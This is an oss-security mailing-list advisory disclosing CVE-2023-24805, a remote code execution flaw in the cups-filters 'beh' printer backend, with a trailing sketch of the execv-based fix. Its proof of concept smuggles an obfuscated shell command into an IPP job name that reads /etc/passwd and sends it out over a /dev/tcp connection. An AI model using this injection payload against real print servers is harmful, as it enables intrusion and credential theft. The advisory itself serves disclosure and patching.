List: oss-security
Subject: [oss-security] CVE-2023-24805: RCE in cups-filters, beh CUPS backend
From: Till Kamppeter <till.kamppeter () gmail ! com>
Date: 2023-05-17 9:30:11
Message-ID: d20c573e-81ca-800d-5bf8-c2f96b31ea82 () gmail ! com
The following bug was reported to OpenPrinting's GitHub, repo cups-filters,
as a private (security) issue report:
https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-gpxc-v2m8-fr3x
Summary
If you use "beh" to create an accessible network printer, this security
vulnerability can cause remote code execution.
Details
cups-filters/backend/beh.c, line 288 in 5c9498a:

    // (context: argv = beh <job-id> <user> <title> <copies> <options> [file])
    snprintf(cmdline, sizeof(cmdline),
             "%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
             cups_serverbin, scheme, argv[1], argv[2], argv[3],
             ...
             (argc == 6 ? "1" : argv[4]),
             argv[5], filename);
    ...
    retval = system(cmdline) >> 8;
The system function will be called here to execute the command, and the
user and title parameters are user-controlled and unsanitized.
PoC
Start a beh service:

    lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100
Exploit (uses https://github.com/williamkapke/ipp):

    var ipp = require('ipp');
    var PDFDocument = require('pdfkit');
    var concat = require("concat-stream");

    var doc = new PDFDocument({margin: 0});
    doc.text("1.pdf", 0, 0);
    doc.pipe(concat(function (data) {
        var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter");
        var msg = {
            "operation-attributes-tag": {
                "requesting-user-name": "Bumblebee",
                "job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > ${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf",
                "document-format": "application/pdf"
            },
            "job-attributes-tag": {
                "media-col": {
                    "media-source": "tray-2"
                }
            },
            data: data
        };
        printer.execute("Print-Job", msg, function (err, res) {
            console.log(err);
            console.log(res);
        });
    }));
    doc.end();
The report got assigned CVE-2023-24805.
A fix is to use execv() instead of system() and was proposed as a pull
request attached to the bug report.
https://github.com/OpenPrinting/cups-filters-ghsa-gpxc-v2m8-fr3x/pull/1
The pull request is merged now into
https://github.com/OpenPrinting/cups-filters (branch "master")
as commit
https://github.com/OpenPrinting/cups-filters/commit/8f274035756
and the fix is also ported to the "1.x" branch of cups-filters, as commit
https://github.com/OpenPrinting/cups-filters/commit/93e60d3df35
The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.
Till
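Added illustration, not part of the post above and not cups-filters' own code: a hypothetical C sketch of the fix direction the post names, replacing the snprintf()+system() command line with a fork()/execv() argv vector so that the untrusted user and title fields reach the real backend as single arguments that no shell ever parses. The names beh_build_argv and beh_run_backend, the sample argv and the use of /bin/echo as a stand-in backend are assumptions.

```c
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hypothetical rewrite of beh's dispatch step (not cups-filters' code). beh is
 * invoked as: beh <job-id> <user> <title> <copies> <options> [file]. Rather than
 * splicing these into one string for system(), hand them to the real backend as
 * separate argv entries, so quotes and ';' in user/title never reach /bin/sh. */
/* Build the child's NULL-terminated argv (room for 8 entries); returns its argc. */
int beh_build_argv(const char *backend_path, char **argv_in, int argc_in,
                   const char *filename, char **argv_out)
{
    int n = 0;
    argv_out[n++] = (char *)backend_path;                       /* argv[0]    */
    argv_out[n++] = argv_in[1];                                 /* job-id     */
    argv_out[n++] = argv_in[2];                                 /* user       */
    argv_out[n++] = argv_in[3];                                 /* title      */
    argv_out[n++] = (argc_in == 6) ? (char *)"1" : argv_in[4];  /* copies     */
    argv_out[n++] = argv_in[5];                                 /* options    */
    if (filename != NULL)
        argv_out[n++] = (char *)filename;                       /* spool file */
    argv_out[n] = NULL;
    return n;
}
/* fork + execv, no shell. Returns the backend's exit status (what
 * "system(cmdline) >> 8" approximated), 127 if exec fails, -1 on error. */
int beh_run_backend(const char *backend_path, char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(backend_path, argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample: title with shell metacharacters; /bin/echo stands in
     * for the real backend and just prints the title back as one argument. */
    char *in[] = { "beh", "42", "alice", "job'; id; '", "1", "", NULL };
    char *out[8];
    beh_build_argv("/bin/echo", in, 6, NULL, out);
    return beh_run_backend("/bin/echo", out);
}
```

Run stand-alone it prints the job arguments on one line, with the title intact and nothing between its quotes executed.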